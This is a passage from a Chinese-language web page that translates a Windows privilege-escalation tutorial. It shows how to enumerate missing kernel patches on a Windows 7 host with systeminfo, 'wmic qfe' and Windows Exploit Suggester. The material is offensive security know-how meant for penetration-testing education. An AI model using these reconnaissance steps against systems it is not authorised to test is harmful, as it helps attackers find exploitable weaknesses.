<!doctype html>
<html lang="zh" dir="ltr" class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-渗透/Windows 提权/Windows 提权-内核利用_1" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.7.0">
<title data-rh="true">Windows 提权-内核利用_1 | 扛枪的书生</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:image" content="https://kqdssheng.github.io/web/img/docusaurus-social-card.jpg"><meta data-rh="true" name="twitter:image" content="https://kqdssheng.github.io/web/img/docusaurus-social-card.jpg"><meta data-rh="true" property="og:url" content="https://kqdssheng.github.io/web/docs/渗透/Windows 提权/Windows 提权-内核利用_1"><meta data-rh="true" property="og:locale" content="zh"><meta data-rh="true" name="docusaurus_locale" content="zh"><meta data-rh="true" name="docsearch:language" content="zh"><meta data-rh="true" name="docusaurus_version" content="current"><meta data-rh="true" name="docusaurus_tag" content="docs-default-current"><meta data-rh="true" name="docsearch:version" content="current"><meta data-rh="true" name="docsearch:docusaurus_tag" content="docs-default-current"><meta data-rh="true" property="og:title" content="Windows 提权-内核利用_1 | 扛枪的书生"><meta data-rh="true" name="description" content="本文通过 Google 翻译 Kernel Exploits Part 1 – Windows Privilege Escalation 这篇文章所产生，本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。"><meta data-rh="true" property="og:description" content="本文通过 Google 翻译 Kernel Exploits Part 1 – Windows Privilege Escalation 这篇文章所产生，本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。"><link data-rh="true" rel="icon" href="/web/img/favicon.ico"><link data-rh="true" rel="canonical" href="https://kqdssheng.github.io/web/docs/渗透/Windows 提权/Windows 提权-内核利用_1"><link data-rh="true" rel="alternate" href="https://kqdssheng.github.io/web/docs/渗透/Windows 提权/Windows 提权-内核利用_1" hreflang="zh"><link data-rh="true" rel="alternate" href="https://kqdssheng.github.io/web/docs/渗透/Windows 提权/Windows 提权-内核利用_1" hreflang="x-default"><link rel="alternate" type="application/rss+xml" href="/web/blog/rss.xml" title="扛枪的书生 RSS Feed">
<link rel="alternate" type="application/atom+xml" href="/web/blog/atom.xml" title="扛枪的书生 Atom Feed"><link rel="stylesheet" href="/web/assets/css/styles.b7abb307.css">
<script src="/web/assets/js/runtime~main.53f73fdc.js" defer="defer"></script>
<script src="/web/assets/js/main.fc57339d.js" defer="defer"></script>
</head>
<body class="navigation-with-keyboard">
<script>!function(){function t(t){document.documentElement.setAttribute("data-theme",t)}var e=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return window.localStorage.getItem("theme")}catch(t){}}();t(null!==e?e:"light")}(),function(){try{const n=new URLSearchParams(window.location.search).entries();for(var[t,e]of n)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id="__docusaurus"><link rel="preload" as="image" href="/web/img/logo.svg"><div role="region" aria-label="跳到主要内容"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">跳到主要内容</a></div><nav aria-label="主导航" class="navbar navbar--fixed-top navbarHideable_m1mJ navbar--primary"><div class="navbar__inner"><div class="navbar__items"><button aria-label="切换导航栏" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/web/"><div class="navbar__logo"><img src="/web/img/logo.svg" alt="kqdssheng" class="themedComponent_mlkZ themedComponent--light_NVdE"><img src="/web/img/logo.svg" alt="kqdssheng" class="themedComponent_mlkZ themedComponent--dark_xIcU"></div></a><a aria-current="page" class="navbar__item navbar__link navbar__link--active" href="/web/docs/category/️渗透">文章</a><a class="navbar__item navbar__link" href="/web/blog">说说</a><div class="navbar__item dropdown dropdown--hoverable"><a href="#" aria-haspopup="true" aria-expanded="false" role="button" class="navbar__link">其它</a><ul class="dropdown__menu"><li><a href="https://www.douban.com/doulist/154252035/" target="_blank" rel="noopener noreferrer" class="dropdown__link">豆瓣<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li><a href="https://www.zhihu.com/people/KqdsshenG" target="_blank" rel="noopener noreferrer" class="dropdown__link">知乎<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li><a href="https://www.cnblogs.com/kqdssheng" target="_blank" rel="noopener noreferrer" class="dropdown__link">博客园<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li><a href="https://github.com/kqdssheng" target="_blank" rel="noopener noreferrer" class="dropdown__link">GitHub<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li></ul></div></div><div class="navbar__items navbar__items--right"><div class="toggle_vylO colorModeToggle_DEke"><button class="clean-btn toggleButton_gllP toggleButtonDisabled_aARS" type="button" disabled="" title="切换浅色/暗黑模式（当前为浅色模式）" aria-label="切换浅色/暗黑模式（当前为浅色模式）" aria-live="polite" aria-pressed="false"><svg viewBox="0 0 24 24" width="24" height="24" class="lightToggleIcon_pyhR"><path fill="currentColor" d="M12,9c1.65,0,3,1.35,3,3s-1.35,3-3,3s-3-1.35-3-3S10.35,9,12,9 M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5 S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1 s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0 c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95 c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41 L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41 s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06 c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" class="darkToggleIcon_wfgR"><path fill="currentColor" d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.19,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.07,6.81,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z"></path></svg></button></div><div class="navbarSearchContainer_Bca1"><div class="navbar__search searchBarContainer_NW3z" dir="ltr"><input placeholder="搜索" aria-label="Search" class="navbar__search-input searchInput_YFbd" value=""><div class="loadingRing_RJI3 searchBarLoadingRing_YnHq"><div></div><div></div><div></div><div></div></div></div></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="main-wrapper mainWrapper_z2l0"><div class="docsWrapper_hBAB"><button aria-label="回到顶部" class="clean-btn theme-back-to-top-button backToTopButton_sjWU" type="button"></button><div class="docRoot_UBD9"><aside class="theme-doc-sidebar-container docSidebarContainer_YfHR"><div class="sidebarViewport_aRkj"><div class="sidebar_njMd sidebarWithHideableNavbar_wUlq"><a tabindex="-1" class="sidebarLogo_isFc" href="/web/"><img src="/web/img/logo.svg" alt="kqdssheng" class="themedComponent_mlkZ themedComponent--light_NVdE"><img src="/web/img/logo.svg" alt="kqdssheng" class="themedComponent_mlkZ themedComponent--dark_xIcU"></a><nav aria-label="文档侧边栏" class="menu thin-scrollbar menu_SIkG"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--active" href="/web/docs/category/️渗透">🕵️渗透</a><button aria-label="折叠侧边栏分类 &#x27;🕵️渗透&#x27;" aria-expanded="true" type="button" class="clean-btn menu__caret"></button></div><ul style="display:block;overflow:visible;height:auto" class="menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" tabindex="0" href="/web/docs/category/linux-提权">Linux 提权</a><button aria-label="展开侧边栏分类 &#x27;Linux 提权&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--active" tabindex="0" href="/web/docs/category/windows-提权">Windows 提权</a><button aria-label="折叠侧边栏分类 &#x27;Windows 提权&#x27;" aria-expanded="true" type="button" class="clean-btn menu__caret"></button></div><ul style="display:block;overflow:visible;height:auto" class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-MSSQL">Windows 提权-MSSQL</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-PrintNightmare">Windows 提权-PrintNightmare</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-RunAs">Windows 提权-RunAs</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-SeBackupPrivilege 特权">Windows 提权-SeBackupPrivilege 特权</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-SeImpersonatePrivilege 特权">Windows 提权-SeImpersonatePrivilege 特权</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-UAC 绕过">Windows 提权-UAC 绕过</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-不安全的 GUI 程序">Windows 提权-不安全的 GUI 程序</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link menu__link--active" aria-current="page" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-内核利用_1">Windows 提权-内核利用_1</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-内核利用_2">Windows 提权-内核利用_2</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-密码搜寻">Windows 提权-密码搜寻</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-手工枚举">Windows 提权-手工枚举</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-服务_DLL 劫持">Windows 提权-服务_DLL 劫持</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-服务_弱文件_目录权限">Windows 提权-服务_弱文件_目录权限</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-服务_弱服务权限">Windows 提权-服务_弱服务权限</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-服务_弱注册表权限">Windows 提权-服务_弱注册表权限</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-服务_未引用的服务路径">Windows 提权-服务_未引用的服务路径</a></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" tabindex="0" href="/web/docs/category/杂项">杂项</a><button aria-label="展开侧边栏分类 &#x27;杂项&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" href="/web/docs/category/linux">🐧Linux</a><button aria-label="展开侧边栏分类 &#x27;🐧Linux&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" href="/web/docs/category/windows">💻Windows</a><button aria-label="展开侧边栏分类 &#x27;💻Windows&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" href="/web/docs/category/杂项-1">📦杂项</a><button aria-label="展开侧边栏分类 &#x27;📦杂项&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" href="/web/docs/category/gpt-问答">🤖GPT 问答</a><button aria-label="展开侧边栏分类 &#x27;🤖GPT 问答&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/web/docs/">🛠️软件百宝箱</a></li></ul></nav><button type="button" title="收起侧边栏" aria-label="收起侧边栏" class="button button--secondary button--outline collapseSidebarButton_PEFL"><svg width="20" height="20" aria-hidden="true" class="collapseSidebarButtonIcon_kv0_"><g fill="#7a7a7a"><path d="M9.992 10.023c0 .2-.062.399-.172.547l-4.996 7.492a.982.982 0 01-.828.454H1c-.55 0-1-.453-1-1 0-.2.059-.403.168-.551l4.629-6.942L.168 3.078A.939.939 0 010 2.528c0-.548.45-.997 1-.997h2.996c.352 0 .649.18.828.45L9.82 9.472c.11.148.172.347.172.55zm0 0"></path><path d="M19.98 10.023c0 .2-.058.399-.168.547l-4.996 7.492a.987.987 0 01-.828.454h-3c-.547 0-.996-.453-.996-1 0-.2.059-.403.168-.551l4.625-6.942-4.625-6.945a.939.939 0 01-.168-.55 1 1 0 01.996-.997h3c.348 0 .649.18.828.45l4.996 7.492c.11.148.168.347.168.55zm0 0"></path></g></svg></button></div></div></aside><main class="docMainContainer_TBSr"><div class="container padding-top--md padding-bottom--lg"><div class="row"><div class="col docItemCol_VOVn"><div class="docItemContainer_Djhp"><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_Z_bl" aria-label="页面路径"><ul class="breadcrumbs" itemscope="" itemtype="https://schema.org/BreadcrumbList"><li class="breadcrumbs__item"><a aria-label="主页面" class="breadcrumbs__link" href="/web/"><svg viewBox="0 0 24 24" class="breadcrumbHomeIcon_YNFT"><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill="currentColor"></path></svg></a></li><li itemscope="" itemprop="itemListElement" itemtype="https://schema.org/ListItem" class="breadcrumbs__item"><a class="breadcrumbs__link" itemprop="item" href="/web/docs/category/️渗透"><span itemprop="name">🕵️渗透</span></a><meta itemprop="position" content="1"></li><li itemscope="" itemprop="itemListElement" itemtype="https://schema.org/ListItem" class="breadcrumbs__item"><a class="breadcrumbs__link" itemprop="item" href="/web/docs/category/windows-提权"><span itemprop="name">Windows 提权</span></a><meta itemprop="position" content="2"></li><li itemscope="" itemprop="itemListElement" itemtype="https://schema.org/ListItem" class="breadcrumbs__item breadcrumbs__item--active"><span class="breadcrumbs__link" itemprop="name">Windows 提权-内核利用_1</span><meta itemprop="position" content="3"></li></ul></nav><div class="tocCollapsible_ETCw theme-doc-toc-mobile tocMobile_ITEo"><button type="button" class="clean-btn tocCollapsibleButton_TO0P">本页总览</button></div><div class="theme-doc-markdown markdown"><header><h1>Windows 提权-内核利用_1</h1></header><blockquote>
<p>本文通过 Google 翻译 <a href="https://juggernaut-sec.com/kernel-exploits-part-1/" target="_blank" rel="noopener noreferrer">Kernel Exploits Part 1 – Windows Privilege Escalation</a> 这篇文章所产生，本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。</p>
</blockquote>
<hr>
<h2 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="导航">导航<a href="#导航" class="hash-link" aria-label="导航的直接链接" title="导航的直接链接">​</a></h2>
<ul>
<li><a href="#id0">0 前言</a></li>
<li><a href="#id1">1 旧版 Windows 系统内核利用</a></li>
<li><a href="#id2">2 搜寻内核漏洞</a>
<ul>
<li><a href="#id2.1">2.1 枚举内核利用 - 手动</a></li>
<li><a href="#id2.2">2.2 枚举内核利用 - 自动</a>
<ul>
<li><a href="#id2.2.1">2.2.1 Windows Exploit Suggester 2</a></li>
<li><a href="#id2.2.2">2.2.2 Sherlock.ps1</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#id3">3 使用内核利用</a>
<ul>
<li><a href="#id3.1">3.1 使用内核利用 - GUI</a></li>
<li><a href="#id3.2">3.2 使用内核利用 - Reverse Shell</a></li>
</ul>
</li>
<li><a href="#id4">4 通过 Metasploit 查找及使用内核利用</a></li>
</ul>
<hr>
<h2 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="0前言"><strong><div id="id0">0、前言</div></strong><a href="#0前言" class="hash-link" aria-label="0前言的直接链接" title="0前言的直接链接">​</a></h2>
<blockquote>
<p>由于 Windows 内核利用的信息量比较大，故将本篇文章分成了两个部分。</p>
</blockquote>
<p>在第一部分内容中，我们将介绍如何在旧版 Windows 系统中进行内核利用。</p>
<p>我们从打了最少补丁的 Windows 7 机器开始测试，然后使用各种检测内核利用的方法去枚举它容易受到哪些内核漏洞的攻击。在找到潜在漏洞后，我们将测试相应的漏洞利用，看看它们是如何工作的。在测试漏洞利用期间，我们将看到 6 个测试示例，它们展示了如何从 GUI、从反向 shell 和使用 Metasploit 的方式去提升普通权限到 SYSTEM。</p>
<blockquote>
<p>注：文中出现了较多的“内核漏洞”和“内核利用”等字眼，因此有必要搞清二者之间的关系。其实内核利用是内核漏洞的实例，<strong>漏洞</strong>是一个概念，<strong>漏洞利用</strong>是实践。</p>
</blockquote>
<h2 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="1旧版-windows-系统内核利用"><strong><div id="id1">1、旧版 Windows 系统内核利用</div></strong><a href="#1旧版-windows-系统内核利用" class="hash-link" aria-label="1旧版-windows-系统内核利用的直接链接" title="1旧版-windows-系统内核利用的直接链接">​</a></h2>
<p>Windows 内核利用按照 OS 版本又可以分为两个类：旧版 Windows 系统、新版 Windows 系统。其中 <strong>Windows 10/Server 2016/Server 2019/ 其它更新版本</strong> 都称为新版 Windows 系统，而在此之前的 <strong>Windows XP/7/Server 2008/Server 2012/其它更旧版本</strong> 都称为旧版 Windows 系统。</p>
<p>对于本文，我们将研究旧版 Windows 系统的内核利用，测试机器是仅安装了一个补丁的 Windows 7 SP1 7601。</p>
<h2 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="2搜寻内核漏洞"><strong><div id="id2">2、搜寻内核漏洞</div></strong><a href="#2搜寻内核漏洞" class="hash-link" aria-label="2搜寻内核漏洞的直接链接" title="2搜寻内核漏洞的直接链接">​</a></h2>
<p>在此示例中，假设我们已经在 Windows 7 机器上获得了标准用户 bob 的身份。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191841068-481334806-dfc291fb587f80da83f38868936f1572.png" width="522" height="177" class="img_ev3q"></p>
<h4 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="21枚举内核利用---手动"><strong><div id="id2.1">2.1、枚举内核利用 - 手动</div></strong><a href="#21枚举内核利用---手动" class="hash-link" aria-label="21枚举内核利用---手动的直接链接" title="21枚举内核利用---手动的直接链接">​</a></h4>
<p>在枚举内核漏洞利用前，我们首先要做的是使用 systeminfo 命令查看系统的信息，其中重点关注 **操作系统版本、架构，以及最关键 HotFixes（KB）**这些信息。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843056-939508344-d3eba4c5c90fc0576ef2be4c9effabbc.png" width="739" height="702" class="img_ev3q"></p>
<p>从上面可以看到，该主机是 Windows 7 Pro – SP1 7601 – x86 (32-bit) 系统，同时该主机只有一个补丁。</p>
<p>为了收集有关补丁的更多信息，可以使用以下 wmic 命令：</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">wmic qfe get Caption,Description,HotFixID,InstalledOn</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191841249-1451999296-f19d090be31b041c123b101f3a08e361.png" width="638" height="85" class="img_ev3q"></p>
<p>由于微软给每个内核漏洞都起了一个名称作为标识，而名称中又包括发现漏洞的年份，因此<strong>补丁的发布日期</strong>很值得注意。【例如 MS10-059（2010）表示该漏洞是在 2010 年的第 59 个安全公告中发布的，而该公告确切的发布时间是2010年8月10日。】</p>
<blockquote>
<p>注意：<strong>补丁的发布日期</strong>和通过 wmic 发现的<strong>补丁安装时间</strong>可不是同一回事，作者的意思应该是根据补丁 KB 号码去查找该补丁实际的发布时间，然后根据这个时间去排除这个日期范围内的内核漏洞利用程序【因为补丁和漏洞的披露通常来说是先发补丁后发漏洞或同时发布，当然这也不绝对。】。例如，补丁如果是2000年发布的，那么2000年之后的系统漏洞就是可以被利用的。当然如果补丁的安装时间是在2000年，那么这个漏洞肯定是在2000年或2000年之前发布的，那么使用2000年之后的漏洞大概率也是有效的。</p>
</blockquote>
<p>从这里，我们可以开始分析系统安装有哪些补丁，然后搜索 KB 号，以确定由于该补丁而无法使用的内核利用。</p>
<p>这种手动枚举的方式对于安装了少量的补丁来说，效果很好。但是，如果安装了几百个补丁， 那手工的方式显然就不再适合了。</p>
<h4 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="22枚举内核利用---自动"><strong><div id="id2.2">2.2、枚举内核利用 - 自动</div></strong><a href="#22枚举内核利用---自动" class="hash-link" aria-label="22枚举内核利用---自动的直接链接" title="22枚举内核利用---自动的直接链接">​</a></h4>
<p>有两个工具可以很好地枚举旧版 Windows 系统的内核利用，第一个是Windows Exploit Suggester 2，第二个是 sherlock.ps1。</p>
<p>这两种工具的工作原理都是将受害者已安装的补丁与这些补丁库中已打补丁的漏洞列表进行交叉引用。以此为基础，这些工具将从输出中排除已打补丁的漏洞，只提供主机未打补丁的漏洞。</p>
<blockquote>
<p>在测试内核利用时，使用自动工具有助于消除大部分猜测。【注：当然工具也会存在遗漏的情况。】</p>
</blockquote>
<h6 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="221windows-exploit-suggester-2"><strong><div id="id2.2.1">2.2.1、Windows Exploit Suggester 2</div></strong><a href="#221windows-exploit-suggester-2" class="hash-link" aria-label="221windows-exploit-suggester-2的直接链接" title="221windows-exploit-suggester-2的直接链接">​</a></h6>
<p>使用的第一个工具是 <a href="https://github.com/7Ragnarok7/Windows-Exploit-Suggester-2" target="_blank" rel="noopener noreferrer">Windows Exploit Suggester 2</a>，它是一个 Python 脚本。在攻击者机器上使用此脚本前，我们需要先获取受害者机器上的 systeminfo 系统信息，以及补丁库的文件。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191841777-294411196-1c761bed04005e3ae921fb935354ee95.png" width="804" height="726" class="img_ev3q"></p>
<p>现在，我们已经准备好了受害者的系统信息 txt 文件，还可以更新补丁库 XLS 文件，以确保补丁列表是最新的。不过，由于这是一个只安装了一个补丁的旧操作系统，因此不需要更新补丁库文件，因为 2021 年 4 月前的补丁库已经足够满足当前的需要了。</p>
<p>可以使用以下命令运行 Windows Exploit Suggester：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">./windows-exploit-suggester.py --database 2021-04-16-mssb.xls --systeminfo win7.txt</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843727-1929661561-e6ba341b32fdf57fd3f628de77f663c3.png" width="987" height="579" class="img_ev3q"></p>
<p>输出内容有很多，但大部分信息对我们来说并没有用。同时，该工具还提供了一个标识说明（E|M|*），以告诉我们对应的系统漏洞是否有二进制或 Metasploit 模块可供使用。</p>
<p>于是，我们就可以根据提供的标识进行内容过滤，让其只筛选出我们感兴趣的信息，这些信息通常包含有 [M]或[E]或“Elevation of privileges”字段。</p>
